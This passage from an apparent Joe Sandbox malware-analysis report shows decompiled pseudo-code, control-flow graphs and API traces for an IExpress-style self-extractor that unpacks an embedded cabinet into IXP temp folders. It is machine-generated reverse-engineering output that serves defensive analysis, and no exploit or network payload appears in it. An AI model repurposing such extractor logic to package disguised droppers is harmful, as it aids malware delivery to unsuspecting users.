                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4237285672-0
                                                                                                                                                                                                                                              • Opcode ID: 992b8b569f0d508abc62d11d48171e83d67bbc0c56c43a955c9a92dd5da3a5a6
                                                                                                                                                                                                                                              • Instruction ID: 3a9243b2b3f26a3686676053a5afa3fd0165c43124c4862ef04ad61e8c68ee46
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 992b8b569f0d508abc62d11d48171e83d67bbc0c56c43a955c9a92dd5da3a5a6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E971B3B5A0420CAFDB16DF24CC85BFB77AEEB4A314F4440AAF50696540DB708E85CB20
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 374 1a4fe0-1a501a call 1a468f FindResourceA LoadResource LockResource 377 1a5020-1a5027 374->377 378 1a5161-1a5163 374->378 379 1a5029-1a5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->379 380 1a5057-1a505e call 1a4efd 377->380 379->380 383 1a507c-1a50b4 380->383 384 1a5060-1a5077 call 1a44b9 380->384 389 1a50e8-1a5104 call 1a44b9 383->389 390 1a50b6-1a50da 383->390 388 1a5107-1a510e 384->388 391 1a511d-1a511f 388->391 392 1a5110-1a5117 FreeResource 388->392 398 1a5106 389->398 390->398 402 1a50dc 390->402 394 1a513a-1a5141 391->394 395 1a5121-1a5127 391->395 392->391 400 1a515f 394->400 401 1a5143-1a514a 394->401 395->394 399 1a5129-1a5135 call 1a44b9 395->399 398->388 399->394 400->378 401->400 404 1a514c-1a5159 SendMessageA 401->404 405 1a50e3-1a50e6 402->405 404->400 405->389 405->398
                                                                                                                                                                                                                                              C-Code - Quality: 77%
                                                                                                                                                                                                                                              			E001A4FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* _t8;
                                                                                                                                                                                                                                              				struct HWND__* _t9;
                                                                                                                                                                                                                                              				int _t10;
                                                                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                                                                              				struct HWND__* _t24;
                                                                                                                                                                                                                                              				struct HWND__* _t27;
                                                                                                                                                                                                                                              				intOrPtr _t29;
                                                                                                                                                                                                                                              				void* _t33;
                                                                                                                                                                                                                                              				int _t34;
                                                                                                                                                                                                                                              				CHAR* _t36;
                                                                                                                                                                                                                                              				int _t37;
                                                                                                                                                                                                                                              				intOrPtr _t47;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t33 = __edi;
                                                                                                                                                                                                                                              				_t36 = "CABINET";
                                                                                                                                                                                                                                              				 *0x1a9144 = E001A468F(_t36, 0, 0);
                                                                                                                                                                                                                                              				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                                                              				 *0x1a9140 = _t8;
                                                                                                                                                                                                                                              				if(_t8 == 0) {
                                                                                                                                                                                                                                              					return _t8;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t9 =  *0x1a8584; // 0x0
                                                                                                                                                                                                                                              				if(_t9 != 0) {
                                                                                                                                                                                                                                              					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                                                              					ShowWindow(GetDlgItem( *0x1a8584, 0x841), 5);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t10 = E001A4EFD(0, 0);
                                                                                                                                                                                                                                              				if(_t10 != 0) {
                                                                                                                                                                                                                                              					__imp__#20(E001A4CA0, E001A4CC0, E001A4980, E001A4A50, E001A4AD0, E001A4B60, E001A4BC0, 1, 0x1a9148, _t33);
                                                                                                                                                                                                                                              					_t34 = _t10;
                                                                                                                                                                                                                                              					if(_t34 == 0) {
                                                                                                                                                                                                                                              						L8:
                                                                                                                                                                                                                                              						_t29 =  *0x1a9148; // 0x0
                                                                                                                                                                                                                                              						_t24 =  *0x1a8584; // 0x0
                                                                                                                                                                                                                                              						E001A44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						_t37 = 0;
                                                                                                                                                                                                                                              						L9:
                                                                                                                                                                                                                                              						goto L10;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					__imp__#22(_t34, "*MEMCAB", 0x1a1140, 0, E001A4CD0, 0, 0x1a9140); // executed
                                                                                                                                                                                                                                              					_t37 = _t10;
                                                                                                                                                                                                                                              					if(_t37 == 0) {
                                                                                                                                                                                                                                              						goto L9;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					__imp__#23(_t34); // executed
                                                                                                                                                                                                                                              					if(_t10 != 0) {
                                                                                                                                                                                                                                              						goto L9;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L8;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t27 =  *0x1a8584; // 0x0
                                                                                                                                                                                                                                              					E001A44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					_t37 = 0;
                                                                                                                                                                                                                                              					L10:
                                                                                                                                                                                                                                              					_t12 =  *0x1a9140; // 0x0
                                                                                                                                                                                                                                              					if(_t12 != 0) {
                                                                                                                                                                                                                                              						FreeResource(_t12);
                                                                                                                                                                                                                                              						 *0x1a9140 = 0;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(_t37 == 0) {
                                                                                                                                                                                                                                              						_t47 =  *0x1a91d8; // 0x0
                                                                                                                                                                                                                                              						if(_t47 == 0) {
                                                                                                                                                                                                                                              							E001A44B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(( *0x1a8a38 & 0x00000001) == 0 && ( *0x1a9a34 & 0x00000001) == 0) {
                                                                                                                                                                                                                                              						SendMessageA( *0x1a8584, 0xfa1, _t37, 0);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					return _t37;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}

















                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001A46A0
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: SizeofResource.KERNEL32(00000000,00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46A9
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001A46C3
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: LoadResource.KERNEL32(00000000,00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46CC
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: LockResource.KERNEL32(00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46D3
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: memcpy_s.MSVCRT ref: 001A46E5
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46EF
                                                                                                                                                                                                                                              • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 001A4FFE
                                                                                                                                                                                                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 001A5006
                                                                                                                                                                                                                                              • LockResource.KERNEL32(00000000), ref: 001A500D
                                                                                                                                                                                                                                              • GetDlgItem.USER32(00000000,00000842), ref: 001A5030
                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 001A5037
                                                                                                                                                                                                                                              • GetDlgItem.USER32(00000841,00000005), ref: 001A504A
                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 001A5051
                                                                                                                                                                                                                                              • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 001A5111
                                                                                                                                                                                                                                              • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 001A5159
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                              • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                              • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                              • Opcode ID: c777cb6f35ea7493746e78cfe2fd2b5570f73fdbafbc8d758de509e4004b1af9
                                                                                                                                                                                                                                              • Instruction ID: 5eee972d5a5208b1cdc626f45b346da3072c390d6898bfdc906cdc20d7ee5588
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c777cb6f35ea7493746e78cfe2fd2b5570f73fdbafbc8d758de509e4004b1af9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1931B4B87847027BE7205B61AD89F77369DFB8B765F440025F906A29A2DBF48CC0C661
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph for function 1a44b9 (legend: executed / not executed); nodes call LoadStringA, LocalAlloc, MessageBoxA, MessageBeep and LocalFree.]
                                                                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                                                                              			E001A44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v64;
                                                                                                                                                                                                                                              				char _v576;
                                                                                                                                                                                                                                              				void* _v580;
                                                                                                                                                                                                                                              				struct HWND__* _v584;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t34;
                                                                                                                                                                                                                                              				void* _t37;
                                                                                                                                                                                                                                              				signed int _t39;
                                                                                                                                                                                                                                              				intOrPtr _t43;
                                                                                                                                                                                                                                              				signed int _t44;
                                                                                                                                                                                                                                              				signed int _t49;
                                                                                                                                                                                                                                              				signed int _t52;
                                                                                                                                                                                                                                              				void* _t54;
                                                                                                                                                                                                                                              				intOrPtr _t55;
                                                                                                                                                                                                                                              				intOrPtr _t58;
                                                                                                                                                                                                                                              				intOrPtr _t59;
                                                                                                                                                                                                                                              				int _t64;
                                                                                                                                                                                                                                              				void* _t66;
                                                                                                                                                                                                                                              				intOrPtr* _t67;
                                                                                                                                                                                                                                              				signed int _t69;
                                                                                                                                                                                                                                              				intOrPtr* _t73;
                                                                                                                                                                                                                                              				intOrPtr* _t76;
                                                                                                                                                                                                                                              				intOrPtr* _t77;
                                                                                                                                                                                                                                              				void* _t80;
                                                                                                                                                                                                                                              				void* _t81;
                                                                                                                                                                                                                                              				void* _t82;
                                                                                                                                                                                                                                              				intOrPtr* _t84;
                                                                                                                                                                                                                                              				void* _t85;
                                                                                                                                                                                                                                              				signed int _t89;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t75 = __edx;
                                                                                                                                                                                                                                              				_t34 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                                                              				_v584 = __ecx;
                                                                                                                                                                                                                                              				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                                                              				_t67 = _a4;
                                                                                                                                                                                                                                              				_t69 = 0xd;
                                                                                                                                                                                                                                              				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                                                              				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                                                              				_v580 = _t37;
                                                                                                                                                                                                                                              				asm("movsb");
                                                                                                                                                                                                                                              				if(( *0x1a8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                              					_t39 = 1;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_v576 = 0;
                                                                                                                                                                                                                                              					LoadStringA( *0x1a9a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                                                              					if(_v576 != 0) {
                                                                                                                                                                                                                                              						_t73 =  &_v576;
                                                                                                                                                                                                                                              						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                                                              						_t75 = _t16;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t43 =  *_t73;
                                                                                                                                                                                                                                              							_t73 = _t73 + 1;
                                                                                                                                                                                                                                              						} while (_t43 != 0);
                                                                                                                                                                                                                                              						_t84 = _v580;
                                                                                                                                                                                                                                              						_t74 = _t73 - _t75;
                                                                                                                                                                                                                                              						if(_t84 == 0) {
                                                                                                                                                                                                                                              							if(_t67 == 0) {
                                                                                                                                                                                                                                              								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                                                              								_t83 = _t27;
                                                                                                                                                                                                                                              								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                                                              								_t80 = _t44;
                                                                                                                                                                                                                                              								if(_t80 == 0) {
                                                                                                                                                                                                                                              									goto L6;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t75 = _t83;
                                                                                                                                                                                                                                              									_t74 = _t80;
                                                                                                                                                                                                                                              									E001A1680(_t80, _t83,  &_v576);
                                                                                                                                                                                                                                              									goto L23;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t76 = _t67;
                                                                                                                                                                                                                                              								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                                                              								_t85 = _t24;
                                                                                                                                                                                                                                              								do {
                                                                                                                                                                                                                                              									_t55 =  *_t76;
                                                                                                                                                                                                                                              									_t76 = _t76 + 1;
                                                                                                                                                                                                                                              								} while (_t55 != 0);
                                                                                                                                                                                                                                              								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                                                              								_t83 = _t25 + _t74;
                                                                                                                                                                                                                                              								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                                                              								_t80 = _t44;
                                                                                                                                                                                                                                              								if(_t80 == 0) {
                                                                                                                                                                                                                                              									goto L6;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									E001A171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                              									goto L23;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t77 = _t67;
                                                                                                                                                                                                                                              							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                                                              							_t81 = _t18;
                                                                                                                                                                                                                                              							do {
                                                                                                                                                                                                                                              								_t58 =  *_t77;
                                                                                                                                                                                                                                              								_t77 = _t77 + 1;
                                                                                                                                                                                                                                              							} while (_t58 != 0);
                                                                                                                                                                                                                                              							_t75 = _t77 - _t81;
                                                                                                                                                                                                                                              							_t82 = _t84 + 1;
                                                                                                                                                                                                                                              							do {
                                                                                                                                                                                                                                              								_t59 =  *_t84;
                                                                                                                                                                                                                                              								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E001A171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E001A681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E001A67C9(_t74, _t74);
									_t49 = 0x190000;
									if(_t54 == 0) {
										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16); // executed
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
						if(E001A681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E001A67C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E001A6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}
                                                                                                                                                                                                                                              0x001a4675
                                                                                                                                                                                                                                              0x001a45ad
                                                                                                                                                                                                                                              0x001a4527
                                                                                                                                                                                                                                              0x001a452e
                                                                                                                                                                                                                                              0x001a453f
                                                                                                                                                                                                                                              0x001a453f
                                                                                                                                                                                                                                              0x001a4530
                                                                                                                                                                                                                                              0x001a4531
                                                                                                                                                                                                                                              0x001a4538
                                                                                                                                                                                                                                              0x001a453d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a453d
                                                                                                                                                                                                                                              0x001a4554
                                                                                                                                                                                                                                              0x001a455a
                                                                                                                                                                                                                                              0x001a455a
                                                                                                                                                                                                                                              0x001a455a
                                                                                                                                                                                                                                              0x001a4525
                                                                                                                                                                                                                                              0x001a468c

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001A4518
                                                                                                                                                                                                                                              • MessageBoxA.USER32(?,?,lenta,00010010), ref: 001A4554
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000065), ref: 001A45A3
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000065), ref: 001A45E3
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000002), ref: 001A460D
                                                                                                                                                                                                                                              • MessageBeep.USER32(00000000), ref: 001A4630
                                                                                                                                                                                                                                              • MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 001A4666
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 001A466F
                                                                                                                                                                                                                                                • Part of subcall function 001A681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 001A686E
                                                                                                                                                                                                                                                • Part of subcall function 001A681F: GetSystemMetrics.USER32(0000004A), ref: 001A68A7
                                                                                                                                                                                                                                                • Part of subcall function 001A681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 001A68CC
                                                                                                                                                                                                                                                • Part of subcall function 001A681F: RegQueryValueExA.ADVAPI32(?,001A1140,00000000,?,?,0000000C), ref: 001A68F4
                                                                                                                                                                                                                                                • Part of subcall function 001A681F: RegCloseKey.ADVAPI32(?), ref: 001A6902
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                              • String ID: LoadString() Error. Could not load string resource.$lenta
                                                                                                                                                                                                                                              • API String ID: 3244514340-1000497449
                                                                                                                                                                                                                                              • Opcode ID: ae996b8f13466edc24ca4a9e240d617f7eb89a360f851461ea746c5c2fee1707
                                                                                                                                                                                                                                              • Instruction ID: 19badc855b786d9dd2b9b2716a454348aac200ce736a0828df5dc50e29ef1e7e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae996b8f13466edc24ca4a9e240d617f7eb89a360f851461ea746c5c2fee1707
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E51367A900215AFDB219F68CC48BBA7B79EF87310F044195FD49A3241DBB1DE45CBA0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%


                                                                                                                                                                                                                                              C-Code - Quality: 95%
                                                                                                                                                                                                                                              			E001A53A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t5;
                                                                                                                                                                                                                                              				long _t13;
                                                                                                                                                                                                                                              				int _t14;
                                                                                                                                                                                                                                              				CHAR* _t20;
                                                                                                                                                                                                                                              				int _t29;
                                                                                                                                                                                                                                              				int _t30;
                                                                                                                                                                                                                                              				CHAR* _t32;
                                                                                                                                                                                                                                              				signed int _t33;
                                                                                                                                                                                                                                              				void* _t34;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t5 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                                                              				_t32 = __edx;
                                                                                                                                                                                                                                              				_t20 = __ecx;
                                                                                                                                                                                                                                              				_t29 = 0;
                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                              					E001A171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                                                              					_t34 = _t34 + 0x10;
                                                                                                                                                                                                                                              					_t29 = _t29 + 1;
                                                                                                                                                                                                                                              					E001A1680(_t32, 0x104, _t20);
                                                                                                                                                                                                                                              					E001A658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                                                              					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                                                              					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                                                              					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                                                              						break;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(_t29 < 0x190) {
                                                                                                                                                                                                                                              						continue;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L3:
                                                                                                                                                                                                                                              					_t30 = 0;
                                                                                                                                                                                                                                              					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                                                              						_t30 = 1;
                                                                                                                                                                                                                                              						DeleteFileA(_t32);
                                                                                                                                                                                                                                              						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L5:
                                                                                                                                                                                                                                              					return E001A6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                                                              				if(_t14 == 0) {
                                                                                                                                                                                                                                              					goto L3;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t30 = 1;
                                                                                                                                                                                                                                              				 *0x1a8a20 = 1;
                                                                                                                                                                                                                                              				goto L5;
                                                                                                                                                                                                                                              			}


















                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 001A171E: _vsnprintf.MSVCRT ref: 001A1750
                                                                                                                                                                                                                                              • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A53FB
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A5402
                                                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A541F
                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A542B
                                                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A5434
                                                                                                                                                                                                                                              • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A5452
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                                                              • API String ID: 1082909758-957705000
                                                                                                                                                                                                                                              • Opcode ID: 7fcda86d06a4b404a41701d60ed164983ab346a1318396e06b5e96d0f80a6153
                                                                                                                                                                                                                                              • Instruction ID: b9b2b1add617a0a35df640ef7711ca424543fc1b56b6656dce32ca519b3d7809
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7fcda86d06a4b404a41701d60ed164983ab346a1318396e06b5e96d0f80a6153
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA11317570460077D7209F329C08FAF3A6EEFD7321F400024B606C2590DF748D82C6A2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              control_flow_graph 522 1a5467-1a5484 523 1a548a-1a5490 call 1a53a1 522->523 524 1a551c-1a5528 call 1a1680 522->524 527 1a5495-1a5497 523->527 528 1a552d-1a5539 call 1a58c8 524->528 529 1a549d-1a54c0 call 1a1781 527->529 530 1a5581-1a5583 527->530 535 1a553b-1a5545 CreateDirectoryA 528->535 536 1a554d-1a5552 528->536 544 1a550c-1a551a call 1a658a 529->544 545 1a54c2-1a54d8 GetSystemInfo 529->545 534 1a558d-1a559d call 1a6ce0 530->534 540 1a5577-1a557c call 1a6285 535->540 541 1a5547 535->541 542 1a5554-1a5557 call 1a597d 536->542 543 1a5585-1a558b 536->543 540->530 541->536 553 1a555c-1a555e 542->553 543->534 544->528 546 1a54da-1a54dd 545->546 547 1a54fe 545->547 551 1a54df-1a54e2 546->551 552 1a54f7-1a54fc 546->552 554 1a5503-1a5507 call 1a658a 547->554 557 1a54f0-1a54f5 551->557 558 1a54e4-1a54e7 551->558 552->554 553->543 559 1a5560-1a5566 553->559 554->544 557->554 558->544 561 1a54e9-1a54ee 558->561 559->530 562 1a5568-1a5575 RemoveDirectoryA 559->562 561->554 562->530
                                                                                                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                                                                                                              			E001A5467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
